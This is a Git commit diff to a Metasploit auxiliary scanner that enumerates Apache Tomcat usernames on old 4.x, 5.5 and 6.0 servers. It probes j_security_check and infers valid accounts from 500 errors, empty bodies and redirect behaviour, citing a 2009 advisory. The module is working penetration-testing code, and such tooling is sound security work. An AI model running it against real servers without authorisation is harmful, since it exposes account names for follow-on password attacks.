Land rapid7#2235, @wchen-r7's patch for [SeeRM rapid7#6264]

jvazquez-r7 · jvazquez-r7 · commit c5d426fc7072 · 2013-08-17T10:05:41.000-05:00
diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb
@@ -20,8 +20,11 @@ def initialize
 		super(
 			'Name'           => 'Apache Tomcat User Enumeration',
 			'Description'    => %q{
-					Apache Tomcat user enumeration utility, for Apache Tomcat servers prior to version
-				6.0.20, 5.5.28, and 4.1.40.
+					This module enumerates Apache Tomcat's usernames via malformed requests to
+				j_security_check, which can be found in the web administration package. It should
+				work against Tomcat servers 4.1.0 - 4.1.39, 5.5.0 - 5.5.27, and 6.0.0 - 6.0.18.
+				Newer versions no longer have the "admin" package by default. The 'admin' package
+				is no longer provided for Tomcat 6 and later versions.
 			},
 			'Author'         =>
 				[
@@ -54,7 +57,23 @@ def target_url
 		"http://#{vhost}:#{rport}#{uri}"
 	end
 
+	def has_j_security_check?
+		vprint_status("#{target_url} - Checking j_security_check...")
+		res = send_request_raw({'uri' => normalize_uri(datastore['URI'])})
+		if res
+			vprint_status("#{target_url} - Server returned: #{res.code.to_s}")
+			return true if res.code == 200 or res.code == 302
+		end
+
+		false
+	end
+
 	def run_host(ip)
+		unless has_j_security_check?
+			print_error("#{target_url} - Unable to enumerate users with this URI")
+			return
+		end
+
 		@users_found = {}
 
 		each_user_pass { |user,pass|
@@ -85,15 +104,18 @@ def do_login(user)
 					'data'    => post_data,
 				}, 20)
 
-			if res
-				if res.code == 200
-					if res.headers['Set-Cookie']
-						vprint_status("#{target_url} - Apache Tomcat #{user} not found ")
-					else
-						print_good("#{target_url} - Apache Tomcat #{user} found ")
-						@users_found[user] = :reported
-					end
-				end
+			if res and res.code == 200 and res.headers['Set-Cookie']
+				vprint_error("#{target_url} - Apache Tomcat #{user} not found ")
+			elsif res and res.code == 200 and res.body =~ /invalid username/i
+				vprint_error("#{target_url} - Apache Tomcat #{user} not found ")
+			elsif res and res.code == 500
+				# Based on: http://archives.neohapsis.com/archives/bugtraq/2009-06/0047.html
+				vprint_good("#{target_url} - Apache Tomcat #{user} found ")
+				@users_found[user] = :reported
+			elsif res and res.body.empty? and res.headers['Location'] !~ /error\.jsp$/
+				# Based on: http://archives.neohapsis.com/archives/bugtraq/2009-06/0047.html
+				print_good("#{target_url} - Apache Tomcat #{user} found ")
+				@users_found[user] = :reported
 			else
 				print_error("#{target_url} - NOT VULNERABLE")
 				return :abort
@@ -106,3 +128,12 @@ def do_login(user)
 	end
 
 end
+
+=begin
+
+If your Tomcat doesn't have the admin package by default, download it here:
+http://archive.apache.org/dist/tomcat/	
+
+The package name should look something like: apache-tomcat-[version]-admin.zip
+
+=end
